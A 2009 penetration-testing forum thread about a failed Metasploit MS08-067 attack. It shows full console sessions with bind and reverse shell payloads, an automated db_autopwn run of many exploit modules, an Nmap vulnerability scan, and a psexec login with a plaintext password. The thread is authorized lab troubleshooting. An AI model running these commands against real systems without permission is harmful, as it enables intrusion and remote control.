HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 46 guests online
 
Free Business and Tech Magazines and eBooks

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow Question when exploit target via metasploit ms08-06_netapi
EH-Net
May 21, 2013, 12:18:38 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Question when exploit target via metasploit ms08-06_netapi  (Read 16936 times)
0 Members and 1 Guest are viewing this topic.
raymond hua
Newbie
*
Offline Offline

Posts: 3


View Profile
« on: December 17, 2009, 10:56:12 PM »
My test target is 9.181.147.90, When I have set the settings and began to exploit, it appeared below error information: Exploit failed: Connection reset by peer. 
After the first attempt, I tried to exploit it again. Then the error information is exploit failed: the connection was refused by the remote host (9.181.147.90:445).
At the same time the port 445 was closed.


msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set

Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                             Value
  ----                             -----
  ConnectTimeout                   10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          true
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  DisablePayloadHandler            false
  EXITFUNC                         thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                false
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size         1024
  SMB::pipe_write_min_size         1
  SMBDirect                        true
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                       SSL3
  TCP::max_send_size               0
  TCP::send_delay                  0
  WfsDelay                         0
  lhost                            9.181.73.46
  payload                          generic/shell_bind_tcp
  rhost                            9.181.147.90
  target                           0

msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
  • Selected Target: Windows XP SP2 Chinese - Traditional (NX)
  • Triggering the vulnerability...
    • [-] Exploit failed: Connection reset by peer
  • Exploit completed, but no session was created.

Then I used another way, let Metasploit scan execute the exploit automatically via the command db_autopwn -p -t -e. Then the results as below, the exploitation stopped in the Started bind handler for a long time, at last the attempt was failed.

msf > db_autopwn -p -t -e
  • Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
  • Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
  • (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445...
  • Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
  • (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139...
  • Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139...
  • Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25...
  • Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25...
  • Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139...
  • Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445...
  • Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
  • (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
  • Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
  • (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
    • [-] Exploit failed: The following options failed to validate: MAILTO.
  • Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
  • (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
  • Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139...
  • Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
  • (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
  • Started bind handler
  • Connecting to SMTP server 9.181.147.90:25...
  • Started bind handler
  • Started bind handler
  • Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25...
  • Job limit reached, waiting on modules to finish...
  • Connected to target SMTP server.
  • Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
  • Started bind handler
    • [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
  • Started bind handler
  • Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  • Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
  • Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
  • Sending exploit ...
    • [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
  • Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
  • (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
  • (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139...
  • Started bind handler
  • Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139...
  • Started bind handler
    • [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
  • Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • Started bind handler
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
  • (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
    • [-] Exploit failed: The connection timed out (9.181.147.90:445).
  • (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
    • [-] Exploit failed: can't convert nil into Integer
  • Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
  • (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139...
    • [-] Exploit failed: can't convert nil into Integer
  • Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
    • [-] Exploit failed: The connection timed out (9.181.147.90:139).
  • (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
    • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139...
  • Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler

I'm appreciated if who can help me, thanks!
Logged
3PIL0GU3
Newbie
*
Offline Offline

Posts: 38


View Profile
« Reply #1 on: December 18, 2009, 01:37:09 AM »
Did you try using a Reverse TCP payload instead of a bind shell payload you may have better luck
Logged
----------------------------
CEH
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #2 on: December 19, 2009, 12:24:43 AM »
I sincerely hope you have permission to exploit that host.   There could be an IPS or AntiVirus product stopping your exploit. 
Logged
~~~~~~~~~~~~~~
Ketchup
raymond hua
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #3 on: December 20, 2009, 07:46:32 PM »
To: 3PIL0GU3

Follow your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.


Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                             Value
  ----                             -----
  ConnectTimeout                   10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          True
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  DisablePayloadHandler            false
  EXITFUNC                         thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                False
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size         1024
  SMB::pipe_write_min_size         1
  SMBDirect                        True
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                       SSL3
  TCP::max_send_size               0
  TCP::send_delay                  0
  WfsDelay                         0
  lhost                            9.181.73.46
  payload                          windows/shell/reverse_tcp
  rhost                            9.181.147.90
  target                           0

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
  • Selected Target: Windows XP SP2 Chinese - Traditional (NX)
  • Triggering the vulnerability...
    • [-] Exploit failed: Connection reset by peer
  • Exploit completed, but no session was created.

after the attempt, I use another bash to check port 445, it was closed. before the attempt, port 445 are open....Maybe I should show my scan results from NMAP for you reference.

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间

NSE: Script Scanning completed.

Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)

Host is up (0.00s latency).

Not shown: 995 closed ports

PORT     STATE SERVICE

25/tcp   open  smtp

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-term-serv



Host script results:

|  smb-check-vulns: 

|    MS08-067: VULNERABLE

|    Conficker: Likely CLEAN

|    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|_   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
Logged
raymond hua
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #4 on: December 20, 2009, 08:22:29 PM »
To Ketchup

9.181.147.90 is owned by myself and all the tests have been approved by my manage.
I have uninstalled our firewall and I think there have no IPS in our internal network. But I do not know whether exist a limitation. For this case, I can exploit 9.181.147.90 via psexec and have administrator authority.


C:\>psexec \\9.181.147.90 -u hua -p basketball -e cmd.exe

PsExec v1.91 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Sincerely hope your reply!
Logged
LSOChris
Guest
« Reply #5 on: December 24, 2009, 11:49:00 AM »
my guess is that the return is bad or something like DEP is preventing code execution. try manually setting the target.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.135 seconds with 22 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Free Business and Tech Magazines and eBooks

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.